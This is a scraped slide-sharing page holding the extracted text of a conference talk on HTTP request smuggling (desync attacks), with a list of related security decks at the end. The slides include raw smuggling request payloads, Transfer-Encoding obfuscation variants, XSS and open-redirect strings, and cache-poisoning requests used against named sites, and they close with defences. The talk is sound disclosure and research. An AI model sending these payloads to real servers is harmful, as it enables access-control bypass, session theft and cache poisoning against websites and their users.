http tp desync attacks
play

HTTP TP DESYNC ATTACKS SM SMASH SHING INTO THE CE CELL NEXT DOOR - PowerPoint PPT Presentation

Mar 09, 2024 •454 likes •783 views

HTTP TP DESYNC ATTACKS SM SMASH SHING INTO THE CE CELL NEXT DOOR James Kettle Th The Fear ar Th Theor ory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005

  1. HTTP TP DESYNC ATTACKS SM SMASH SHING INTO THE CE CELL NEXT DOOR James Kettle

  2. Th The Fear ar Th Theor ory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005 "You will not earn bounties" "You will certainly not be considered like a white hat"

  3. Ou Outline • Theory & Methodology • Exploitation Case Studies • Defence • Q&A

  4. HT HTTP/1. 1.1 1 keep eep-aliv alive HTTP over TLS/TCP

  5. HT HTTP/1. 1.1 1 keep eep-alive, desynch chronized

  6. Desynch chronizing: the cl classic c approach ch POST / HTTP/1.1 Host: example.com Content-Length: 6 Front-end sees this Back-end sees this Content-Length: 5 POST / HTTP/1.1 12345G Host: example.com … Unknown method GPOST

  7. Desynch chronizing: the ch chunked approach ch POST / HTTP/1.1 Host: example.com Content-Length: 6 Front-end sees this Transfer-Encoding: chunked Back-end sees this 0 GPOST / HTTP/1.1 … Unknown method GPOST

  8. Desynch chronizing: the TE.CL approach ch POST / HTTP/1.1 Host: example.com Content-Length: 3 Back-end sees this Front-end sees this Transfer-Encoding: chunked 6 \r\n PREFIX 0 POST / HTTP/1.1 Host: example.com

  9. Forci cing desync If a message is received with both a Transfer-Encoding header field and a Content- Length header field, the latter MUST be ignored. – RFC 2616 #4.4.3 Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 123 Transfer-Encoding: x Transfer-Encoding : chunked Transfer-Encoding: xchunked Transfer-Encoding:[tab]chunked GET / HTTP/1.1 Transfer-Encoding: chunked X: X[\n]Transfer-Encoding: chunked Transfer-Encoding : chunked

  10. Me Metho thodo dology

  11. Detect cting desync POST /about HTTP/1.1 POST /about HTTP/1.1 Host: example.com Host: example.com Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 6 Content-Length: 6 3 0 abc X Q CL.CL: backend response CL.CL: backend response TE.TE: frontend response TE.TE: backend response TE.CL: frontend response TE.CL: timeout CL.TE: timeout CL.TE: socket poison

  12. Confirmi Co ming g des esyn ync POST /search HTTP/1.1 POST /search HTTP/1.1 Content-Length: 51 Content-Length: 4 Transfer-Encoding: zchunked Transfer-Encoding: zchunked 11 96 =x&q=smuggling&x= GET /404 HTTP/1.1 0 X: X=1&q=smugging&x= Host: example.com GET /404 HTTP/1.1 Content-Length: 100 POST /search HTTP/1.1 X: X Host: example.com x= … 0 POST /search HTTP/1.1 Triggers 404 if vulnerable Host: example.com

  13. CASE STUDIES

  14. By Bypassing rules POST / HTTP/1.1 Host: software-vendor.com Content-Length: 200 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: software-vendor.com HTTP/1.1 200 OK X: X GET / HTTP/1.1 Host: software-vendor.com Please log in

  15. By Bypassing rewrite tes POST / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 Content-Length: 200 Transfer-Encoding : chunked 0 GET / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 xyz.burpcollaborator.net X: X GET… $ 300

  16. Request reflect ction Please ensure that your email and POST / HTTP/1.1 password are correct. Host: login.newrelic.com <input id="email" value="asdfPOST Content-Length: 142 /login HTTP/1.1 Transfer-Encoding: chunked Host: login.newrelic.com Transfer-Encoding: x X-Forwarded-For: 81.139.39.150 X-Forwarded-Proto: https 0 X-TLS-Bits: 128 X-TLS-Cipher: ECDHE-RSA-AES128… POST /login HTTP/1.1 x-nr-external-service: external Host: login.newrelic.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 … login[pass]=1234&login[email]=asdf POST /login HTTP/1.1 Host: login.newrelic.com

  17. Ex Exploring GET / HTTP/1.1 HTTP/1.1 301 Moved Permanently Host: staging-alerts.newrelic.com Location: https://staging-alerts.newrelic.com/ GET / HTTP/1.1 HTTP/1.1 404 Not Found Host: staging-alerts.newrelic.com X-Forwarded-Proto: https Action Controller: Exception caught GET /revision_check HTTP/1.1 HTTP/1.1 200 OK Host: staging-alerts.newrelic.com X-Forwarded-Proto: https Not authorized with header: GET /revision_check HTTP/1.1 HTTP/1.1 403 Forbidden Host: staging-alerts.newrelic.com X-Forwarded-Proto: https Forbidden X-nr-external-service: 1

  18. Ex Exploring POST /login HTTP/1.1 HTTP/1.1 200 OK Host: login.newrelic.com Content-Length: 564 { "user": { Transfer-Encoding: chunked "account_id": 934454, Transfer-encoding: cow "is_newrelic_admin": true 0 }, "current_account_id": 934454 POST /internal_api/934454/session HTTP/1.1 … Host: alerts.newrelic.com } X-Forwarded-Proto: https Service-Gateway-Account-Id: 934454 Service-Gateway-Is-Newrelic-Admin: true Content-Length: 6 … GET … x=123 +$3,000 =$3,300

  19. In Involuntary y req eques est storage POST /1/cards HTTP/1.1 Host: trello.com Transfer-Encoding:[tab]chunked Content-Length: 4 9f PUT /1/members/1234 HTTP/1.1 Host: trello.com Content-Type: application/x-www-form-urlencoded Content-Length: 400 x=x&csrf=1234&username=testzzz&bio=cake 0 +$1,800 GET / HTTP/1.1 +$2,500 Host: trello.com =$7,600

  20. Ha Harmful res esponses es POST / HTTP/1.1 HTTP/1.1 200 OK Host: saas-app.com … Content-Length: 4 <input name="SAML" Transfer-Encoding : chunked value="a"><script>alert(1) </script> 10 =x&csrf=token&x= 0 66 POST /index.php HTTP/1.1 POST / HTTP/1.1 Host: saas-app.com Host: saas-app.com Content-Length: 100 Cookie: … SAML=a"><script>alert(1)</script> "/> 0 POST / HTTP/1.1 Host: saas-app.com +$2,000 Cookie: … =$9,600

  21. Acci ccidental Cach che Poisoning POST / HTTP/1.1 Frontend perspective Host: redacted.com Content-Length: 45 GET /images/x.png HTTP/1.1 Transfer-Encoding: chunked 0 HTTP/1.1 301 Moved Permanently Location: https://52.16.21.24/ POST / HTTP/1.1 Host: 52.16.21.24 X: X GET /images/x.png HTTP/1.1

  22. Web Cach che Dece ception++ Front-end perspective POST / HTTP/1.1 Transfer-Encoding: blah GET /static/site.js HTTP/1.1 0 HTTP/1.1 200 OK GET /user/apikey HTTP/1.1 X: X GET /static/site.js HTTP/1.1 Your API key Cookie: sessionid=xyz … Expected habitat: Sensitive responses with fixed, uncached extensions Sensitive POST responses

  23. CDN CDN Ch Chaining POST /cow.jpg HTTP/1.1 Host: redacted.com Content-Type: application/x-www-form-urlencoded Content-Length: 50 Transfer-Encoding: chunked 0 GET / HTTP/1.1 Host: www.redhat.com X: X GET… Red Hat - We make open source technologies for the enterprise

  24. Ch Chaining g DO DOM Problems ems GET /assets/idx?redir=//redhat.com@evil.net/ HTTP/1.1 Runs on unknown Host: www.redhat.com URL in victim's browser <script> var destination = getQueryParam('redir') [low quality filtering] document.location = destination </script> POST /en/search?dest=../assets/idx?redir=… HTTP/1.1 Solution: chain a Host: www.redhat.com server-side local redirect HTTP/1.1 301 Found Location: /assets/idx?redir=//redhat.co…

  25. Redirect cts with teeth POST /etc/libs/xyz.js HTTP/1.1 Host: redacted.com Content-Length: 57 Transfer-Encoding: chunked 0 POST /etc HTTP/1.1 +$550 Host: burpcollaborator.net +$750 X: X GET /etc/libs/xyz.js HTTP/1.1 +$1,000 … +$2,000 +$5,000 HTTP/1.1 301 Moved Permanently +$10,500 Location: https://burpcollaborator.net/etc/ =$27,400

  26. Web Cach che Poisoning POST /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Content-Length: 61 Transfer-Encoding: chunked 0 GET /webstatic HTTP/1.1 ? Host: skeletonscribe.net X: XGET /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Connection: close HTTP/1.1 302 Found Location: http://skeletonscribe.net , c.paypal.com/webstatic/ ?

  27. Pa PayPa Pal Po Poisoning +$18,900 =$46,300

  28. Wr Wrapped exploits HTTP/1.1 403 Forbidden GET / HTTP/1.1 Server: AkamaiGHost Host: c.paypal.com Content-Length: 5 <HTML><HEAD> Transfer-Encoding: chunked <TITLE>Access Denied</TITLE> 0 </HEAD> GET / HTTP/1.1 HTTP/1.1 200 OK Host: c.paypal.com … Content-Length: 5 Transfer-Encoding: chunked 0 +$20,000 =$66,300

  29. DEMO -bugzilla- +$4,500 =$70,800

  30. Defence ce Attack Tooling • Support manual/invalid content-length • Don't normalize requests • Test environment must match prod Safety • Frontend: Normalize ambiguous requests – RFC 7230 • Frontend: Use HTTP/2 to talk to backend • Backend: Drop request & connection

  31. Fu Furth ther er rea eading Whitepaper https://portswigger.net/blog/http-desync-attacks Online labs https://portswigger.net/web-security/request-smuggling Burp Suite Extension https://github.com/portswigger/http-request-smuggler References http://cgisecurity.com/lib/HTTP-Request-Smuggling.pdf DEF CON 24 – regilero - Hiding Wookiees in HTTP

  32. Ta Takeaways • HTTP Request Smuggling is real • HTTP/1.1 parsing is security critical • Detection doesn't have to be dangerous @albinowax Email: james.kettle@portswigger.net

Recommend

Mark Shtern DDoS Attacks http://en.wikipedia.org/wiki/Operation_Pa yback

Mark Shtern DDoS Attacks http://en.wikipedia.org/wiki/Operation_Pa yback

Mark Shtern DDoS Attacks http://en.wikipedia.org/wiki/Operation_Pa yback http://www.betterhostreview.com/wp-content/uploads/2013/08/ddos-attack.gif 2 DDoS Attacks http://blog.rivalhost.com/wp- http://en.wikipedia.org/wiki/Low

800 views • 36 slides
Website fingerprinting attacks against Tor Browser Bundle: a comparison between HTTP/1.1 and

Website fingerprinting attacks against Tor Browser Bundle: a comparison between HTTP/1.1 and

Tor website fingerprinting Website fingerprinting attacks against Tor Browser Bundle: a comparison between HTTP/1.1 and HTTP/2 T.T.N. Marks BSc. K.C.N. Halvemaan BSc. University of Amsterdam System and Network Engineering Research Project #1

664 views • 32 slides
More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html

More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html

More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html http://hackingdistributed.com/2016/06/18/analysis-of-the-dao- exploit/ https://hackernoon.com/what-caused-the-latest-100-million-

853 views • 36 slides
Cache-timing attacks http://cr.yp.to/papers.html #cachetiming , 2005: D. J. Bernstein This

Cache-timing attacks http://cr.yp.to/papers.html #cachetiming , 2005: D. J. Bernstein This

Cache-timing attacks http://cr.yp.to/papers.html #cachetiming , 2005: D. J. Bernstein This paper reports successful Thanks to: extraction of a complete AES key University of Illinois at Chicago from a network server NSF CCR9983950 on

1.28k views • 91 slides
http://www.cl.cam.ac.uk/~mgk25/sc99-tamper[-slides].pdf Classes of Attacks on Security Modules

http://www.cl.cam.ac.uk/~mgk25/sc99-tamper[-slides].pdf Classes of Attacks on Security Modules

Design Principles for Tamper-Resistant Smartcard Processors Oliver Kmmerling Markus G. Kuhn ADSR Computer Laboratory http://www.cl.cam.ac.uk/~mgk25/sc99-tamper[-slides].pdf Classes of Attacks on Security Modules Microprobing Open the

465 views • 22 slides
NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3

NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3

CMPS122: COMPUTER SECURITY NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3 due tonight NETWORKING ATTACKS LAST TIME TCP/IP networking stack Physical layer Data link layer Network

1.1k views • 61 slides
Transcript Collision Attacks: Breaking Authentication in TLS, IKE and SSH or: MD5 MUST DIE

Transcript Collision Attacks: Breaking Authentication in TLS, IKE and SSH or: MD5 MUST DIE

Transcript Collision Attacks: Breaking Authentication in TLS, IKE and SSH or: MD5 MUST DIE http://sloth-attack.org Karthikeyan Bhargavan Gatan Leurent Crypto protocols and applications evolve Agility: graceful transition from old to new

228 views • 18 slides
Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22 Overview What is a stream cipher? Classification of attacks Different Attacks Exhaustive Key Search Time Memory Tradeoffs

656 views • 22 slides
Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to penetrate a network by using wireless or evading WLAN access control measures, like AP MAC filters and 802.1X port access controls. Type of Attack

184 views • 7 slides
Computer Security http://security.di.unimi.it/sicurezza1819/ Chapter 3: 1 Chapter 17: Network

Computer Security http://security.di.unimi.it/sicurezza1819/ Chapter 3: 1 Chapter 17: Network

Computer Security http://security.di.unimi.it/sicurezza1819/ Chapter 3: 1 Chapter 17: Network Security Chapter 17: 2 Agenda Net adversary TCP attacks DNS attacks Firewalls Intrusion detection Honeypots Chapter 17: 3

792 views • 62 slides
Defeating Relay Attacks in NFC Payments Serge Vaudenay COLE POLYTECHNIQUE FDRALE DE

Defeating Relay Attacks in NFC Payments Serge Vaudenay COLE POLYTECHNIQUE FDRALE DE

Defeating Relay Attacks in NFC Payments Serge Vaudenay COLE POLYTECHNIQUE FDRALE DE LAUSANNE http://lasec.epfl.ch/ SV 2014 distance-bounding SDTA 14 1 / 42 Relay Attacks 1 Distance-Bounding Protocols 2 3 Asymmetric DB Protocols

1.02k views • 42 slides
Downgrade Attacks by Example How Compatibility breaks Security Michael Rodler (@f0rki)

Downgrade Attacks by Example How Compatibility breaks Security Michael Rodler (@f0rki)

Downgrade Attacks by Example How Compatibility breaks Security Michael Rodler (@f0rki) 2012-01-21 Michael Rodler Downgrade Attacks 1 / 39 About me about me @f0rki, http://f0rki.at Student Sichere Informationssysteme Bachelor at

820 views • 51 slides
Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka

Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka

Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka Savola Introduction Describes a view of ISP backbone network attacks Lots of folks in IETF and elsewhere had quite different ideas whats out

529 views • 9 slides
Scanning Applications 2.0 Next generation scan, attacks and tools Shreeraj Shah Washington DC

Scanning Applications 2.0 Next generation scan, attacks and tools Shreeraj Shah Washington DC

Scanning Applications 2.0 Next generation scan, attacks and tools Shreeraj Shah Washington DC 20 th Feb 2008 http: / / shreeraj.blogspot.com Who Am I? http: / / shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http: / /

1.6k views • 94 slides
Four False Stories on Twitter 1. Fake Attacks 2. Fake Attacks Satire 3. Fake Scenes 4.

Four False Stories on Twitter 1. Fake Attacks 2. Fake Attacks Satire 3. Fake Scenes 4.

CASOS Exploring False Story Dynamics in the Black Panther Twitter Conversation Ramon Villa-Cox rvillaco@andrew.cmu.edu Center for Computational Analysis of Social and Organizational Systems http://www.casos.cs.cmu.edu/ Event: Black Panther

265 views • 13 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Phishing Emails CS 142 Lecture Notes: Security Attacks: Phishing Slide 1 Legitimate: Extended

Phishing Emails CS 142 Lecture Notes: Security Attacks: Phishing Slide 1 Legitimate: Extended

Phishing Emails CS 142 Lecture Notes: Security Attacks: Phishing Slide 1 Legitimate: Extended Validation CS 142 Lecture Notes: Security Attacks: Phishing Slide 2 Obviously Illegitimate http://rusprory.mass.hc.ru/old_site/update/index.php CS

550 views • 10 slides
Denial-of-Service (DoS) &amp; Web Attacks CS 161: Computer Security Prof. Vern Paxson TAs:

Denial-of-Service (DoS) &amp; Web Attacks CS 161: Computer Security Prof. Vern Paxson TAs:

Denial-of-Service (DoS) &amp; Web Attacks CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed &amp; Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 17, 2011 Goals For Today Continue our

902 views • 52 slides
Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr.

Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr.

Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr. Principal Software Engineer 2019/02/19 What are cache based attacks ? In cryptography In cryptographic operations, leaking the internal state of a

338 views • 8 slides
Cybercrime and Attacks in in the Dark Sid ide of the Web Dr. Marco Balduzzi * Senior Researcher

Cybercrime and Attacks in in the Dark Sid ide of the Web Dr. Marco Balduzzi * Senior Researcher

Cybercrime and Attacks in in the Dark Sid ide of the Web Dr. Marco Balduzzi * Senior Researcher at Trend Micro http://www.madlab.it @embyte * With the cooperation of Mayra Rosario and Vincenzo Ciancaglini The Dark Ecosystem Dark Nets TOR

966 views • 39 slides
Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks

Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks

Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks require a full- lifecycle approach to email security Paul Roberts, Editor in Chief Speakers Kevin OBrien, CEO 2:00 - 2:05 Introductions,

483 views • 23 slides
CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks

CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks

CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks https://www.reveelium.com/en/ddos-attacks-the-cyber-boogeyman-part-i/ DDoS Attacks 1,700 Gbps!! 2015 :-/

748 views • 20 slides
Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks

Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks

Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks on DNS Denial-of-Service Cache Poisoning Securing DNS Split-Split-DNS DNSSEC 2 DNS The Domain Name System Naming Service

1.15k views • 46 slides
MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( )

MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( )

Software and Web Security 2 MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( ) MitM attack: attacker gets between the browser and the web server, eg eg by setting up a wifi access point

345 views • 9 slides

More recommend